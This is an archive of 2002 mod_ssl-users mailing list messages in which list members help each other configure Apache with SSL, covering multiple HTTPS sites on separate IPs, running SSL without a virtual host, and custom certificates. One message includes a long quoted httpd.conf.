From owner-modssl-users@modssl.org  Wed Nov 20 15:49:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA13659; Wed, 20 Nov 2002 15:48:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.victor-buck.com id PAA13650; Wed, 20 Nov 2002 15:47:49 +0100 (MET)
Received: from 127.0.0.1 (unknown [172.16.3.10])
	by ns1.victor-buck.com (Postfix) with ESMTP id 5784913FCA
	for ; Wed, 20 Nov 2002 15:29:54 +0100 (CET)
Date: Wed, 20 Nov 2002 15:47:39 +0100
From: Ludovic Perard 
X-Mailer: The Bat! (v1.61)
Organization: Imprimerie Victor Buck
X-Priority: 3 (Normal)
Message-ID: <351028539301.20021120154739@victor-buck.com>
To: Boyle Owen 
Subject: Re[2]: SSL with multiple domains on same server
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A552@SOMEXEVS001.ex.ordersx.org>
References: <484A6CA492BE654395D208B1D8D5393973A552@SOMEXEVS001.ex.ordersx.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ludovic Perard 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Boyle,

Wednesday, November 20, 2002, 3:33:00 PM, you wrote:

BO> You are trying to run two name based VHs under SSL. You cannot do this
BO> (see http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47).

BO> The problem is that SSL encapsulates HTTP so the SSL session has to be
BO> negotiated before any HTTP traffic can be seen. But the hostname is in
BO> the HTTP request, so apache cannot decide which VH to use - so it uses
BO> the first by default.

BO> You need to use separate IPs and/or ports...

I'm already using two different IP addresses


-- 
Best regards,
 Ludovic                           
 ludovic.perard@victor-buck.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 16:16:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA14782; Wed, 20 Nov 2002 16:15:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id QAA14720; Wed, 20 Nov 2002 16:14:53 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id gAKFEqfr022508
	for ; Wed, 20 Nov 2002 16:14:52 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAKFEZEs005465
	for ; Wed, 20 Nov 2002 16:14:52 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Re[2]: SSL with multiple domains on same server
Date: Wed, 20 Nov 2002 16:14:45 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A553@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Re[2]: SSL with multiple domains on same server
Thread-Index: AcKQpB3z2HbuKC/WQTSty5hrtg42wAAAxg2g
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>-----Original Message-----
>From: Ludovic Perard [mailto:ludovic.perard@victor-buck.com]
>
>I'm already using two different IP addresses
>

Then it should work. Are you sure? 

Try defining the IP addresses explicity to reveal any DNS
misconfigurations:

Listen 192.168.1.1:443

...
Listen 192.168.1.2:443

...

Rgds,

Owen Boyle

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 17:40:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17653; Wed, 20 Nov 2002 17:39:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-d04.mx.aol.com id RAA17636; Wed, 20 Nov 2002 17:38:04 +0100 (MET)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-d04.mx.aol.com (mail_out_v34.13.) id m.10b.566243d (16237)
	 for ; Wed, 20 Nov 2002 11:37:45 -0500 (EST)
Received: from  netscape.net (mow-m05.webmail.aol.com [64.12.184.133]) by air-in03.mx.aol.com (v89.21) with ESMTP id MAILININ31-1120113745; Wed, 20 Nov 2002 11:37:45 1900
Date: Wed, 20 Nov 2002 11:37:45 -0500
To: modssl-users@modssl.org
Subject: Re: FreeBSD 4.x and Apache+mod_ssl
MIME-Version: 1.0
Message-ID: <71E0D860.14E03E01.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>Thanks for the help, but I am either too sleepy or too slow to make 
>this work right. I did these steps from the /usr/ports/www/apache13-
>modssl/ directory:
>make
>make certificate TYPE=custom
>make install
>
>When I do the make install, it automatically writes in the snake oil CA 
>and server cert, which are old and expired. How do I get it to 
>recognize and use my new custom CA and server cert?

I'd highly recommend the CA scripts available at ModSSL thusly:

http://www.openssl.org/contrib/ssl.ca-0.1.tar.gz

-----------------------------------------
camccuk@netscape.net


__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 19:35:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22880; Wed, 20 Nov 2002 19:34:18 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from vega.fmf.uni-lj.si id TAA22871; Wed, 20 Nov 2002 19:33:22 +0100 (MET)
Received: (qmail 12682 invoked by uid 0); 20 Nov 2002 18:32:33 -0000
	 by uid 100 with qmail-scanner-1.10
X-Virus-Scan: by vega.fmf.uni-lj.si (Sophos)
Received: from vs1.fmf.uni-lj.si (HELO 127.0.0.1) (193.2.110.23)
  by 0 with SMTP; 20 Nov 2002 18:32:32 -0000
Date: Wed, 20 Nov 2002 19:33:42 +0100
From: Kristijan Cafuta RIP 
X-Mailer: The Bat! (v1.60m) Personal
X-Priority: 3 (Normal)
Message-ID: <150272384518.20021120193342@rip-computer.si>
To: Ludovic Perard 
Subject: Re: SSL with multiple domains on same server
In-Reply-To: <1191027180657.20021120152501@victor-buck.com>
References: <1191027180657.20021120152501@victor-buck.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kristijan Cafuta RIP 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try using IP based virtual host and not name based

lp, K


Wednesday, November 20, 2002, 3:25:01 PM, you wrote:

LP> Hello.

LP>   I'm trying to set up Apache with SSL on Windows 2000.

LP>   It is working but I have some troubles with the certificates.

LP>   If my Apache server is server.mydomain.com and I want to have two
LP>   websites with HTTPS. The SSL is well enabled and works fine.

LP>   It is what I did :

LP>   * openssl req -config openssl.cnf -new -out -website1.csr

LP>     -> then I put "website1.mydomain.com" as common name

LP>   * openssl rsa -in privkey.pem -out website1.key

LP>   * openssl x509 -in website1.csr -out website1.cert -req -signkey website1.key -days 365

LP>     -> To have a temporary signed key

LP>   Then, I did all these operation a second time for the website2.
LP>   (with "website2.mydomain.com" as common name for the second .csr)

LP>   At he end, I have these files :

LP>    - website1.cert
LP>    - website1.key
LP>    - website2.cert
LP>    - website2.key

LP>   In httpd.conf I set up both sites :

LP>   
LP>   SSLEngine On
LP>   SSLCertificateFile ssl/website1.cert
LP>   SSLCertificateKeyFile ssl/website1.key
LP>   

LP>   
LP>   SSLEngine On
LP>   SSLCertificateFile ssl/website2.cert
LP>   SSLCertificateKeyFile ssl/website2.key
LP>   

LP>   website1 and website2 has different IP address

LP>   And then, my problem apears.

LP>   In my browser, I can go two both sites with SSL, but both takes the
LP>   same certificate... Why ? Is there a mismatch between name of the
LP>   server and names of the websites ?



-- 
 Kristijan                            mailto:kristijan@rip-computer.si


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 20:12:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA24278; Wed, 20 Nov 2002 20:11:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA24251; Wed, 20 Nov 2002 20:10:38 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9F9DF4CE76E; Wed, 20 Nov 2002 20:10:36 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1B00D2867F; Wed, 20 Nov 2002 19:51:56 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost.localdomain id PAA10489; Wed, 20 Nov 2002 15:19:04 +0100 (MET)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.5/8.12.5) with ESMTP id gAKEIpSr016867
	for ; Wed, 20 Nov 2002 08:18:51 -0600
Received: (from kperrier@localhost)
	by localhost.localdomain (8.12.5/8.12.5/Submit) id gAKDdWUV016741;
	Wed, 20 Nov 2002 07:39:32 -0600
X-Authentication-Warning: localhost.localdomain: kperrier set sender to kperrier@seitelsolutions.com using -f
Subject: Re: Configuring a stand alone SSL enabled apache webserver
From: Kent Perrier 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) 
Date: 20 Nov 2002 07:39:31 -0600
Message-Id: <1037799571.1128.172.camel@localhost.localdomain>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Perrier 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 2002-11-19 at 15:53, R. DuFresne wrote:
> 
> As far as I'm aware, and others can correct me if I'm saying something
> wrong here, the virtual server directives are optional.  The key would be
> the server root for the ssl based pages to be served, tough enclosing a
> SERVERROOT directive within the virtual server directives would benefit
> you in seperation of pages being servered.  don't be overly confused by
> the virtual server directives, they aren't just for VH hosting .
> 

The question is, how do I turn SSL on outside of a virtual server?  The
SSLEngine On directive gives me the "Illegal attempt to re-initialize
SSL for server" error.  I comment this out, the server starts, I see
mod_ssl listed in the error_log when the server starts and the server is
listening on port 443, but it will not accept SSL connections.  I now
have a standard web server running on port 443, not 80.

FYI, I don't really want to seperate the pages being server, I need
apache to be the front end for a Tomcat based e-commerce application and
I am having problems with getting mod_jk working inside the virtual
server that hosts the SSL enabled server.  I decided to go this route as
I thought it would be easer and server resources are not an issue.

Kent
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 20:12:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA24296; Wed, 20 Nov 2002 20:11:31 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA24245; Wed, 20 Nov 2002 20:10:37 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6ADD14CE748; Wed, 20 Nov 2002 20:10:36 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4AF4F2867F; Wed, 20 Nov 2002 19:51:04 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id MAA02755; Wed, 20 Nov 2002 12:07:21 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gAKB7Lt9019623
	for ; Wed, 20 Nov 2002 12:07:21 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAKB7KOP000004
	for ; Wed, 20 Nov 2002 12:07:20 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Configuring a stand alone SSL enabled apache webserver
Date: Wed, 20 Nov 2002 12:07:20 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A54D@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Configuring a stand alone SSL enabled apache webserver
Thread-Index: AcKQgeqWlM8cWiwSRPud8B9In27FXwAAmSkg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You're correct, there's nothing sacred about using a VirtualHost
container - if you only want one site... 

If you do, you just need a single "Listen 443" then put all the SSL
directive at server config level. Your server will then serve only SSL
pages on port 443 and will not respond at all on port 80.

The key to defining the pages to serve is "DocumentRoot", incidentally.
"ServerRoot" defines where to find the root for logs, conf, bin etc. -
i.e. it is usually /usr/local/apache.

If you need additional sites (e.g. plain HTTP on port 80) then you need
to use VHs.

Rgds,

Owen Boyle


>-----Original Message-----
>From: R. DuFresne [mailto:dufresne@sysinfo.com]
>Sent: Dienstag, 19. November 2002 22:54
>To: Kent Perrier
>Cc: modssl-users@modssl.org
>Subject: Re: Configuring a stand alone SSL enabled apache webserver
>
>
>
>As far as I'm aware, and others can correct me if I'm saying something
>wrong here, the virtual server directives are optional.  The 
>key would be
>the server root for the ssl based pages to be served, tough enclosing a
>SERVERROOT directive within the virtual server directives would benefit
>you in seperation of pages being servered.  don't be overly confused by
>the virtual server directives, they aren't just for VH hosting .
>
>Thanks,
>
>Ron DuFresne
>
>On 19 Nov 2002, Kent Perrier wrote:
>
>> Hi all,
>> 
>> I am looked in the archives and I have not found anything, so I am
>> asking here.  I want to run a different web server on port 
>443 for SSL
>> traffic (not a virtual server in the configuration file for 
>the server
>> on port 80).  Looking at log file, mod_ssl is loaded on 
>start and it is
>> listening on port 443, but the server does not support SSL encrypted
>> traffic. I removed the SSLEngine On directive from the conf 
>file since
>> that only works in a virtual server.  How do I make this work?  I am
>> running Apache 1.3.27, mod_ssl 2.8.12 0.9.6g
>> 
>> FYI, here is my httpd.conf
>> 
>> Thanks!
>> 
>> Kent
>> 
>> ##
>> ## httpd.conf -- Apache HTTP server configuration file
>> ##
>> 
>> #
>> # Based upon the NCSA server configuration files originally 
>by Rob McCool.
>> #
>> # This is the main Apache server configuration file.  It contains the
>> # configuration directives that give the server its instructions.
>> # See  for detailed 
>information about
>> # the directives.
>> #
>> # Do NOT simply read the instructions in here without understanding
>> # what they do.  They're here only as hints or reminders.  
>If you are unsure
>> # consult the online docs. You have been warned.  
>> #
>> # After this file is processed, the server will look for and process
>> # /usr/local/apache1.3/conf/srm.conf and then 
>/usr/local/apache1.3/conf/access.conf
>> # unless you have overridden these with ResourceConfig and/or
>> # AccessConfig directives here.
>> #
>> # The configuration directives are grouped into three basic sections:
>> #  1. Directives that control the operation of the Apache 
>server process as a
>> #     whole (the 'global environment').
>> #  2. Directives that define the parameters of the 'main' or 
>'default' server,
>> #     which responds to requests that aren't handled by a 
>virtual host.
>> #     These directives also provide default values for the settings
>> #     of all virtual hosts.
>> #  3. Settings for virtual hosts, which allow Web requests 
>to be sent to
>> #     different IP addresses or hostnames and have them 
>handled by the
>> #     same Apache server process.
>> #
>> # Configuration and logfile names: If the filenames you 
>specify for many
>> # of the server's control files begin with "/" (or "drive:/" 
>for Win32), the
>> # server will use that explicit path.  If the filenames do 
>*not* begin
>> # with "/", the value of ServerRoot is prepended -- so "logs/foo.log"
>> # with ServerRoot set to "/usr/local/apache" will be 
>interpreted by the
>> # server as "/usr/local/apache/logs/foo.log".
>> #
>> 
>> ### Section 1: Global Environment
>> #
>> # The directives in this section affect the overall 
>operation of Apache,
>> # such as the number of concurrent requests it can handle or where it
>> # can find its configuration files.
>> #
>> 
>> #
>> # ServerType is either inetd, or standalone.  Inetd mode is 
>only supported on
>> # Unix platforms.
>> #
>> ServerType standalone
>> 
>> #
>> # ServerRoot: The top of the directory tree under which the server's
>> # configuration, error, and log files are kept.
>> #
>> # NOTE!  If you intend to place this on an NFS (or otherwise network)
>> # mounted filesystem then please read the LockFile documentation
>> # (available at 
>);
>> # you will save yourself a lot of trouble.
>> #
>> ServerRoot "/usr/local/apache1.3"
>> 
>> #
>> # The LockFile directive sets the path to the lockfile used 
>when Apache
>> # is compiled with either USE_FCNTL_SERIALIZED_ACCEPT or
>> # USE_FLOCK_SERIALIZED_ACCEPT. This directive should 
>normally be left at
>> # its default value. The main reason for changing it is if the logs
>> # directory is NFS mounted, since the lockfile MUST BE 
>STORED ON A LOCAL
>> # DISK. The PID of the main server process is automatically 
>appended to
>> # the filename. 
>> #
>> #LockFile /usr/local/apache1.3/logs/httpd.lock
>> 
>> #
>> # PidFile: The file in which the server should record its process
>> # identification number when it starts.
>> #
>> PidFile /usr/local/apache1.3/logs/httpd.pid
>> 
>> #
>> # ScoreBoardFile: File used to store internal server process 
>information.
>> # Not all architectures require this.  But if yours does 
>(you'll know because
>> # this file will be  created when you run Apache) then you 
>*must* ensure that
>> # no two invocations of Apache share the same scoreboard file.
>> #
>> ScoreBoardFile /usr/local/apache1.3/logs/httpd.scoreboard
>> 
>> #
>> # In the standard configuration, the server will process 
>httpd.conf (this 
>> # file, specified by the -f command line option), srm.conf, 
>and access.conf 
>> # in that order.  The latter two files are now distributed 
>empty, as it is 
>> # recommended that all directives be kept in a single file 
>for simplicity.  
>> # The commented-out values below are the built-in defaults.  
>You can have the 
>> # server ignore these files altogether by using "/dev/null" 
>(for Unix) or
>> # "nul" (for Win32) for the arguments to the directives.
>> #
>> #ResourceConfig conf/srm.conf
>> #AccessConfig conf/access.conf
>> 
>> #
>> # Timeout: The number of seconds before receives and sends time out.
>> #
>> Timeout 300
>> 
>> #
>> # KeepAlive: Whether or not to allow persistent connections 
>(more than
>> # one request per connection). Set to "Off" to deactivate.
>> #
>> KeepAlive On
>> 
>> #
>> # MaxKeepAliveRequests: The maximum number of requests to allow
>> # during a persistent connection. Set to 0 to allow an 
>unlimited amount.
>> # We recommend you leave this number high, for maximum performance.
>> #
>> MaxKeepAliveRequests 100
>> 
>> #
>> # KeepAliveTimeout: Number of seconds to wait for the next 
>request from the
>> # same client on the same connection.
>> #
>> KeepAliveTimeout 15
>> 
>> #
>> # Server-pool size regulation.  Rather than making you guess how many
>> # server processes you need, Apache dynamically adapts to the load it
>> # sees --- that is, it tries to maintain enough server processes to
>> # handle the current load, plus a few spare servers to 
>handle transient
>> # load spikes (e.g., multiple simultaneous requests from a single
>> # Netscape browser).
>> #
>> # It does this by periodically checking how many servers are waiting
>> # for a request.  If there are fewer than MinSpareServers, it creates
>> # a new spare.  If there are more than MaxSpareServers, some of the
>> # spares die off.  The default values are probably OK for most sites.
>> #
>> MinSpareServers 5
>> MaxSpareServers 10
>> 
>> #
>> # Number of servers to start initially --- should be a 
>reasonable ballpark
>> # figure.
>> #
>> StartServers 5
>> 
>> #
>> # Limit on total number of servers running, i.e., limit on the number
>> # of clients who can simultaneously connect --- if this limit is ever
>> # reached, clients will be LOCKED OUT, so it should NOT BE 
>SET TOO LOW.
>> # It is intended mainly as a brake to keep a runaway server 
>from taking
>> # the system with it as it spirals down...
>> #
>> MaxClients 150
>> 
>> #
>> # MaxRequestsPerChild: the number of requests each child process is
>> # allowed to process before the child dies.  The child will exit so
>> # as to avoid problems after prolonged use when Apache (and maybe the
>> # libraries it uses) leak memory or other resources.  On 
>most systems, this
>> # isn't really needed, but a few (such as Solaris) do have 
>notable leaks
>> # in the libraries. For these platforms, set to something like 10000
>> # or so; a setting of 0 means unlimited.
>> #
>> # NOTE: This value does not include keepalive requests after 
>the initial
>> #       request per connection. For example, if a child 
>process handles
>> #       an initial request and 10 subsequent "keptalive" requests, it
>> #       would only count as 1 request towards this limit.
>> #
>> MaxRequestsPerChild 0
>> 
>> #
>> # Listen: Allows you to bind Apache to specific IP addresses and/or
>> # ports, in addition to the default. See also the 
>> # directive.
>> #
>> #Listen 3000
>> #Listen 12.34.56.78:80
>> 
>> #
>> # BindAddress: You can support virtual hosts with this 
>option. This directive
>> # is used to tell the server which IP address to listen to. 
>It can either
>> # contain "*", an IP address, or a fully qualified Internet 
>domain name.
>> # See also the  and Listen directives.
>> #
>> #BindAddress *
>> 
>> #
>> # Dynamic Shared Object (DSO) Support
>> #
>> # To be able to use the functionality of a module which was 
>built as a DSO you
>> # have to place corresponding `LoadModule' lines at this 
>location so the
>> # directives contained in it are actually available _before_ 
>they are used.
>> # Please read the file http://httpd.apache.org/docs/dso.html for more
>> # details about the DSO mechanism and run `httpd -l' for the 
>list of already
>> # built-in (statically linked and thus always available) 
>modules in your httpd
>> # binary.
>> #
>> # Note: The order in which modules are loaded is important.  
>Don't change
>> # the order below without expert advice.
>> #
>> # Example:
>> # LoadModule foo_module libexec/mod_foo.so
>> 
>> LoadModule ssl_module         libexec/libssl.so
>> 
>> 
>> #  Reconstruction of the complete module list from all 
>available modules
>> #  (static and shared ones) to achieve correct module 
>execution order.
>> #  [WHENEVER YOU CHANGE THE LOADMODULE SECTION ABOVE UPDATE 
>THIS, TOO]
>> ClearModuleList
>> AddModule mod_env.c
>> AddModule mod_log_config.c
>> AddModule mod_mime.c
>> AddModule mod_negotiation.c
>> AddModule mod_status.c
>> AddModule mod_include.c
>> AddModule mod_autoindex.c
>> AddModule mod_dir.c
>> AddModule mod_cgi.c
>> AddModule mod_asis.c
>> AddModule mod_imap.c
>> AddModule mod_actions.c
>> AddModule mod_userdir.c
>> AddModule mod_alias.c
>> AddModule mod_access.c
>> AddModule mod_auth.c
>> AddModule mod_so.c
>> AddModule mod_setenvif.c
>> 
>> AddModule mod_ssl.c
>> 
>> 
>> #
>> # ExtendedStatus controls whether Apache will generate "full" status
>> # information (ExtendedStatus On) or just basic information 
>(ExtendedStatus
>> # Off) when the "server-status" handler is called. The 
>default is Off.
>> #
>> #ExtendedStatus On
>> 
>> ### Section 2: 'Main' server configuration
>> #
>> # The directives in this section set up the values used by the 'main'
>> # server, which responds to any requests that aren't handled by a
>> #  definition.  These values also provide defaults for
>> # any  containers you may define later in the file.
>> #
>> # All of these directives may appear inside  containers,
>> # in which case these default settings will be overridden for the
>> # virtual host being defined.
>> #
>> 
>> #
>> # If your ServerType directive (set earlier in the 'Global 
>Environment'
>> # section) is set to "inetd", the next few directives don't have any
>> # effect since their settings are defined by the inetd configuration.
>> # Skip ahead to the ServerAdmin directive.
>> #
>> 
>> #
>> # Port: The port to which the standalone server listens. For
>> # ports < 1023, you will need httpd to be run as root initially.
>> #
>> Port 443
>> 
>> ##
>> ##  SSL Support
>> ##
>> ##  When we also provide SSL we have to listen to the 
>> ##  standard HTTP port (see above) and to the HTTPS port
>> ##
>> 
>> Listen 443
>> 
>> 
>> #
>> # If you wish httpd to run as a different user or group, you must run
>> # httpd as root initially and it will switch.  
>> #
>> # User/Group: The name (or #number) of the user/group to run 
>httpd as.
>> #  . On SCO (ODT 3) use "User nouser" and "Group nogroup".
>> #  . On HPUX you may not be able to use shared memory as 
>nobody, and the
>> #    suggested workaround is to create a user www and use that user.
>> #  NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
>> #  when the value of (unsigned)Group is above 60000; 
>> #  don't use Group nobody on these systems!
>> #
>> User nobody
>> Group nobody
>> 
>> #
>> # ServerAdmin: Your address, where problems with the server should be
>> # e-mailed.  This address appears on some server-generated 
>pages, such
>> # as error documents.
>> #
>> ServerAdmin kperrier@ev1.net
>> 
>> #
>> # ServerName allows you to set a host name which is sent 
>back to clients for
>> # your server if it's different than the one the program 
>would get (i.e., use
>> # "www" instead of the host's real name).
>> #
>> # Note: You cannot just invent host names and hope they 
>work. The name you 
>> # define here must be a valid DNS name for your host. If you 
>don't understand
>> # this, ask your network administrator.
>> # If your host doesn't have a registered DNS name, enter its 
>IP address here.
>> # You will have to access it by its address (e.g., 
>http://123.45.67.89/)
>> # anyway, and this will make redirections work in a sensible way.
>> #
>> # 127.0.0.1 is the TCP/IP local loop-back address, often 
>named localhost. Your 
>> # machine always knows itself by this address. If you use 
>Apache strictly for 
>> # local testing and development, you may use 127.0.0.1 as 
>the server name.
>> #
>> ServerName www.bestofhealthamerica.com
>> 
>> #
>> # DocumentRoot: The directory out of which you will serve your
>> # documents. By default, all requests are taken from this 
>directory, but
>> # symbolic links and aliases may be used to point to other locations.
>> #
>> DocumentRoot "/usr/local/apache1.3/htdocs"
>> 
>> #
>> # Each directory to which Apache has access, can be 
>configured with respect
>> # to which services and features are allowed and/or disabled in that
>> # directory (and its subdirectories). 
>> #
>> # First, we configure the "default" to be a very restrictive set of 
>> # permissions.  
>> #
>> 
>>     Options FollowSymLinks
>>     AllowOverride None
>> 
>> 
>> #
>> # Note that from this point forward you must specifically allow
>> # particular features to be enabled - so if something's not 
>working as
>> # you might expect, make sure that you have specifically enabled it
>> # below.
>> #
>> 
>> #
>> # This should be changed to whatever you set DocumentRoot to.
>> #
>> 
>> 
>> #
>> # This may also be "None", "All", or any combination of "Indexes",
>> # "Includes", "FollowSymLinks", "ExecCGI", or "MultiViews".
>> #
>> # Note that "MultiViews" must be named *explicitly* --- "Options All"
>> # doesn't give it to you.
>> #
>>     Options Indexes FollowSymLinks MultiViews
>> 
>> #
>> # This controls which options the .htaccess files in directories can
>> # override. Can also be "All", or any combination of 
>"Options", "FileInfo", 
>> # "AuthConfig", and "Limit"
>> #
>>     AllowOverride None
>> 
>> #
>> # Controls who can get stuff from this server.
>> #
>>     Order allow,deny
>>     Allow from all
>> 
>> 
>> #
>> # UserDir: The name of the directory which is appended onto 
>a user's home
>> # directory if a ~user request is received.
>> #
>> 
>>     UserDir public_html
>> 
>> 
>> #
>> # DirectoryIndex: Name of the file or files to use as a 
>pre-written HTML
>> # directory index.  Separate multiple entries with spaces.
>> #
>> 
>>     DirectoryIndex index.html
>> 
>> 
>> #
>> # AccessFileName: The name of the file to look for in each directory
>> # for access control information.
>> #
>> AccessFileName .htaccess
>> 
>> #
>> # The following lines prevent .htaccess files from being viewed by
>> # Web clients.  Since .htaccess files often contain authorization
>> # information, access is disallowed for security reasons.  Comment
>> # these lines out if you want Web visitors to see the contents of
>> # .htaccess files.  If you change the AccessFileName directive above,
>> # be sure to make the corresponding changes here.
>> #
>> # Also, folks tend to use names such as .htpasswd for password
>> # files, so this will protect those as well.
>> #
>> 
>>     Order allow,deny
>>     Deny from all
>>     Satisfy All
>> 
>> 
>> #
>> # CacheNegotiatedDocs: By default, Apache sends "Pragma: 
>no-cache" with each
>> # document that was negotiated on the basis of content. This 
>asks proxy
>> # servers not to cache the document. Uncommenting the 
>following line disables
>> # this behavior, and proxies will be allowed to cache the documents.
>> #
>> #CacheNegotiatedDocs
>> 
>> #
>> # UseCanonicalName:  (new for 1.3)  With this setting turned 
>on, whenever
>> # Apache needs to construct a self-referencing URL (a URL 
>that refers back
>> # to the server the response is coming from) it will use 
>ServerName and
>> # Port to form a "canonical" name.  With this setting off, 
>Apache will
>> # use the hostname:port that the client supplied, when 
>possible.  This
>> # also affects SERVER_NAME and SERVER_PORT in CGI scripts.
>> #
>> UseCanonicalName On
>> 
>> #
>> # TypesConfig describes where the mime.types file (or equivalent) is
>> # to be found.
>> #
>> 
>>     TypesConfig /usr/local/apache1.3/conf/mime.types
>> 
>> 
>> #
>> # DefaultType is the default MIME type the server will use 
>for a document
>> # if it cannot otherwise determine one, such as from 
>filename extensions.
>> # If your server contains mostly text or HTML documents, 
>"text/plain" is
>> # a good value.  If most of your content is binary, such as 
>applications
>> # or images, you may want to use "application/octet-stream" 
>instead to
>> # keep browsers from trying to display binary files as 
>though they are
>> # text.
>> #
>> DefaultType text/plain
>> 
>> #
>> # The mod_mime_magic module allows the server to use various 
>hints from the
